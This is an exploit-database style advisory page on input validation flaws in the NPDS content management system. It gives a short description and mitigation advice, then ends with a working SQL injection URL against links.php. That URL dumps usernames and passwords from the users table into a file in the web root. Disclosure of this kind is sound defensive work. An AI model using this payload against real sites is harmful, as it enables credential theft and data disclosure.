header-logo
Suggest Exploit
vendor:
NPDS
by:
SecurityFocus
7.5
CVSS
HIGH
HTML Injection, Cross-Site Scripting and SQL Injection
89, 79, 89
CWE
Product Name: NPDS
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2004

NPDS Multiple Vulnerabilities

NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks. This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.

Mitigation:

Input validation should be used to prevent malicious input from being passed to the application. Additionally, applications should be designed to use least-privileged accounts with the minimum required permissions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/13803/info
       
NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks.
       
This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
       
All versions of NPDS are considered vulnerable to this issue at the moment. 

http://www.example.com/links.php?op=search&query=google%'%20UNION%20SELECT%200,uname,pass,0,0,0,0,0%20FROM%20users%20where%20uname<>''%20INTO%20OUTFILE%20'/var/www/html/npds/sql/s
qlinjection.txt'/*